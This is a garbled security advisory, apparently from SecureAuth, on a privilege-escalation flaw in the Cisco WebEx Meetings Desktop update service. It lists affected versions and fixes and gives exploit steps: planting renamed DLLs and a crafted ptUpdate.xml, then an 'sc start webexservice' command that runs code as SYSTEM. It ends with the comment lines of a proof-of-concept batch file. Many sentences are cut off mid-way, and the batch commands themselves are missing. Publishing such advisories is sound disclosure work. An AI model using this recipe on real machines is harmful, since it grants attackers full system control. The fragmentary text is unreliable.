

Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2

Title: Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2

Cisco's Webex Meetings website states that:

Cisco Webex Meetings: Simply the Best Video Conferencing and Online
With Cisco Webex Meetings, joining is a breeze, audio and video are easier than ever. We help you forget about the technology, to focus on

A vulnerability in the update service of Cisco Webex Meetings Desktop

Cisco Webex Meetings Desktop App v33.6.4.15
Cisco Webex Meetings Desktop App v33.6.5.2
Cisco Webex Meetings Desktop App v33.7.0.694
Cisco Webex Meetings Desktop App v33.7.1.15
Cisco Webex Meetings Desktop App v33.7.2.24
Cisco Webex Meetings Desktop App v33.7.3.7
Cisco Webex Meetings Desktop App v33.8.0.779
Cisco Webex Meetings Desktop App v33.8.1.13
Cisco Webex Meetings Desktop App v33.8.2.7

Older versions are probably affected too, but they were

5. *Vendor Information, Solutions and Workarounds*

Cisco informed that the vulnerability is fixed in Cisco Webex Meetings Desktop App releases 33.6.6 and 33.9.1.

In addition, Cisco published the following advisory:

This vulnerability was discovered and researched by Marcos Accossatto from SecureAuth. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team.

7. *Technical Description / Proof of Concept Code*

The update service of Cisco Webex Meetings Desktop App for Windows does not properly validate version numbers of new files. A local attacker could exploit this vulnerability by invoking the update service command with a crafted argument and folder. This will allow the attacker to run arbitrary commands with SYSTEM user privileges.

The vulnerability can be exploited by copying the atgpcdec.dll binary to a local attacker-controlled folder and renaming it to atgpcdec.7z. Then, a previous version of the ptUpdate.exe file must be compressed as 7z and copied to the attacker-controlled folder.
Placed in the same folder, named vcruntime140.dll and compressed as
Finally, a ptUpdate.xml file must be provided in the attacker-controlled folder for the update binary (ptUpdate.exe) to treat our files as a normal update.

To gain privileges, the attacker must start

sc start webexservice WebexService 1 989898 "attacker-controlled-path"

The following proof of concept performs a 2 step attack, since starting from version 33.8.X, the application enforces the checking of signatures for all the downloaded binaries.
Those versions are: 33.1500 for the first step and 33.1600 for the last
To exploit versions prior to 33.8.X, only one step is required

REM This batch file will exploit CVE-2019-1674
REM First, it will copy the atgpcdec.dll file from the installation
REM folder to the current folder as atgpcdec.7z.
REM ptUpdate.exe and vcruntime140.dll files from the installation folder
REM those files will be replaced (especially, vcruntime140.dll) and if
REM not restored, will render the application useless.
REM The executable ptUpdate.exe version 33.1500 must be
REM compressed as ptUpdate0.7z and present in the current folder.
REM The executable ptUpdate.exe version 33.1600 must be
REM compressed as ptUpdate1.7z and present in the current folder.
REM Both can be generated using 7zip GUI and compressing as 7z, with
REM normal compression level and LZMA compression method.
REM Another way is to compress both files using the command line app:
REM 7z.exe a ptUpdate0.7z ptUpdate.exe -m0=BCJ -m1=LZMA:d=21
REM ptUpdate0.xml file will be used in the first stage of the attack.
REM necessary) the "Size" and "PackagedSize" values of the xml, to the
REM ptUpdate0.7z will be renamed to ptUpdate.7z.
REM The batch will wait until the process (ptUpdate.exe) finishes
REM After the first stage is completed, it will rename ptUpdate.7z
REM back to ptUpdate0.7z, and ptUpdate.xml to ptUpdate0.xml.
REM Now, ptUpdate1.xml file will be used in the second stage of the
REM Our "malicious" DLL will be generated using
REM certutil.exe and named vcruntime140.7z.
REM execute notepad.exe on load and that has the same exported functions
REM The update service will be started again.
REM Once finished, it will print that the attack is done and wait for a
REM You should see a notepad.exe (2, in fact) with SYSTEM
REM After a key is pressed, the batch will finish removing atgpcdec.7z
REM ptUpdate1.7z, and ptUpdate.xml to ptUpdate1.xml.
